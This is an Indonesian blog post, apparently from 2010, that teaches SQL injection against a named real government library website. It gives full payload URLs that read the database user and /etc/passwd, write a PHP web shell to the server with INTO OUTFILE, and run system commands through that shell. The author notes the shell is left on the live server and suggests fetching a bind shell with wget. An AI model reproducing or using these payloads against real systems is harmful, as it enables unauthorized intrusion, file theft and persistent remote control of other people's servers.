Mohon maaf bagi yang sudah tahu.. ini tutor untuk yang belum tau atau yang sudah lupa..
Oke to the point..
http://perpustakaan.bppt.go.id/perpustakaan_web/beritalengkap.php?vnumber=25+AND+1=2+UNION+SELECT+1,2,user(),4,5,6,7,8,9
Ini web dengan user "root" di mysql, jadi kita bisa ngapain aja menjalankan query dalam injectkan kita...
nah selanjutnya kita cek "phpinfo" nya....
http://perpustakaan.bppt.go.id/phpinfo.php
wah gitu doang ternyata /home/pustaka1
atau selain php info bisa dengan,
http://perpustakaan.bppt.go.id/perpustakaan_web/beritalengkap.php?vnumber=25+AND+1=2+UNION+SELECT+1,2,load_file%28%27/etc/passwd%27%29,4,5,6,7,8,9
kita tahu bahwa web ini belum di patch/di perbaharui jadi kita cari folder pustaka1 bukan pustaka2..
w00t..
pustaka1:x:500:500::/home/pustaka1
lest go to hacking..
kita sudah tau bahwa base dirnya adalah "/home/pustaka1";
nah mulai inject shell...
http://perpustakaan.bppt.go.id/perpustakaan_web/beritalengkap.php?vnumber=25+AND+1=2+UNION+SELECT+1,2,%22%3C?%20passthru%28$_GET[%27fly%27]%29;%20?%3E%22,4,5,6,7,8,9+INTO+OUTFILE+%22/home/pustaka1/flyffs.php%22--
note : direktori harus dengan chmod 0755
penjelasannya,. buat jalanin system. dan INTO OUTFILE adalah code sql buat masukin / membuat file baru yang belum ada..
nah lets go to shell..
exec this shell...
http://perpustakaan.bppt.go.id/flyffs.php?fly=cat+/etc/passwd;id;whoami;pwd;ifconfig;uname%20-a
begh mantab .. haha
warning! dont remove this shell, this shell for education.
langkah selajutnya adalah "wget http://shell lo buat ngebind" .. kalo di server ini wget di disable..
nah sekian tutor ini dari saya..
Selasa, 02 Februari 2010
Langganan:
Posting Komentar (Atom)
Tidak ada komentar:
Posting Komentar